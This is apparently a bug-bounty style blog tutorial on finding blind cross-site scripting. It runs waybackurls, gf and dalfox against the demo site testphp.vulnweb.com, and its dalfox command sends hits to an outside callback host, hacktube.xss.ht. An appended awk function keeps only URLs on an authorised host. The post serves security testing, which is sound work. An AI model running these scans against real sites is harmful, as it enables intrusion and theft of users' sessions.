How To Find Blind XSS Using dalfox | (dalfox #2)

Hello all

I am back with another blog on XSS. Let's talk about blind XSS and how we can find it using the dalfox tool. I have already written a blog on dalfox, so go and check it out: https://www.hacktube5.tech/uncategorized/how-to-find-cross-site-scripting-xss-using-dalfox/

So let’s start:

We need a URL to test for blind XSS, so let's take this one: http://testphp.vulnweb.com/

Now let's find some URLs for this site. Type this command in your terminal: waybackurls http://testphp.vulnweb.com | tee testurl.txt

Now just hit <ENTER> and it will find some URLs.

Now we have a file, testurl.txt, so let's find some parameters to test for XSS. For that, use the gf tool, which is on GitHub: https://github.com/tomnomnom/gf

The command is: cat testurl.txt | gf xss >> testxss.txt

Hit <ENTER> and it will give you some parameters to test for XSS.

Now it is time to fire dalfox.

Just type this command: dalfox file testxss.txt pipe -b https://hacktube.xss.ht -F

Hit <ENTER> and see the response

If you want to send these requests to Burp Suite for manual testing, use this command:

dalfox file testxss.txt pipe -b https://hacktube.xss.ht -F --proxy http://127.0.0.1:8080

 

Go to Burp Suite, check the HTTP history, and you will see all the requests there; you can test them manually.
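
The URL list that waybackurls writes to testurl.txt usually contains many near-duplicates and can include archived URLs on hosts other than the one you set out to test. As an added example (not part of the original post), the shell function below keeps only URLs on one allowed host that carry query parameters, one per unique path and set of parameter names; the function name scope_filter and the output file scoped.txt are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. scope_filter is a hypothetical helper.
# Usage: scope_filter testphp.vulnweb.com < testurl.txt > scoped.txt
# Reads URLs on stdin and prints only those that
#   - are http(s) URLs whose host is exactly the allowed host (port ignored),
#   - have a non-empty query string, and
#   - are the first URL seen for their host + path + set of parameter names.
scope_filter() {
  awk -v allowed="$1" '
  BEGIN { allowed = tolower(allowed) }
  {
    url = $0
    sub(/\r$/, "", url)                       # tolerate CRLF input
    sub(/#.*$/, "", url)                      # fragments never reach the server
    if (tolower(url) !~ "^https?://") next
    rest = url
    sub("^[A-Za-z]+://", "", rest)
    n = match(rest, "[/?]")                   # end of the authority part
    if (n == 0) next                          # bare host: nothing to test
    host = tolower(substr(rest, 1, n - 1))
    sub(/^.*@/, "", host)                     # drop userinfo
    sub(/:[0-9]+$/, "", host)                 # drop port
    if (host != allowed) next                 # exact match, no suffix tricks
    tail = substr(rest, n)
    q = index(tail, "?")
    if (q == 0) next
    path  = substr(tail, 1, q - 1)
    query = substr(tail, q + 1)
    if (query == "") next
    np = split(query, p, "&")
    for (i = 1; i <= np; i++) sub(/=.*$/, "", p[i])   # keep names only
    for (i = 2; i <= np; i++) {                       # insertion sort by name
      v = p[i]
      for (j = i - 1; j >= 1 && (p[j] "") > (v ""); j--) p[j + 1] = p[j]
      p[j + 1] = v
    }
    key = host path "?"
    for (i = 1; i <= np; i++) key = key p[i] "&"
    if (!(key in seen)) { seen[key] = 1; print url }
  }'
}
```

Run it on testurl.txt before the gf step and feed the filtered file to gf instead, so that later steps only touch the host you are authorised to test.
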
Thanks For Reading
